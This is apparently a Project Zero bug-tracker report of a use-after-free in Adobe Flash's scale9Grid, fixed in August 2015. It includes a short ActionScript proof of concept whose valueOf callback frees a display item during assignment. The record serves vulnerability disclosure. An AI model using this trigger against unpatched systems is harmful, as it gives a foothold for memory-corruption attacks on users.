New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Issue 380
Starred by 2 users
Status: Fixed
Owner:
cevans@google.com
Email to this user bounced
Closed: Aug 2015
Cc:
project-...@google.com



Sign in to add a comment
 Adobe Flash: Use-after-free in scale9Grid
Project Member Reported by natashenka@google.com, May 14 2015 Back to list 
There is a use-after-free issue if the scale9Grid setting is called on an object with a member that then frees display item. This issue occurs for both MovieClips and Buttons, it needs to be fixed in both classes.

A PoC is as follows:

var n = { valueOf : func };
var o = {x:n, y:0,width:10, height:10}

_global.mc = this
var newmc:MovieClip = this.createEmptyMovieClip("mymc",1)
mymc.scale9Grid = o


function func() {
	trace("here");
	var t = _global.mc.createTextField("test",1,1,1,2,3)
	t.removeTextField()
	return 7
}


A sample fla and swf is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
scale9.fla
4.7 KB Download
scale9.swf
798 bytes Download
Project Member Comment 1 by natashenka@google.com, May 15 2015
Labels: -Reported-2015-May-13 Reported-2015-May-15
Project Member Comment 2 by natashenka@google.com, May 19 2015 
This is PSIRT-3712.
Project Member Comment 3 by natashenka@google.com, Aug 19 2015
Labels: -Restrict-View-Commit
Fixed in August bulletin
Project Member Comment 4 by scvitti@google.com, Aug 20 2015
Status: Fixed
Comment 5 by segovia....@gmail.com, Aug 20 2015 
Do we have a CVE-ID for this vulnerability?
Sign in to add a comment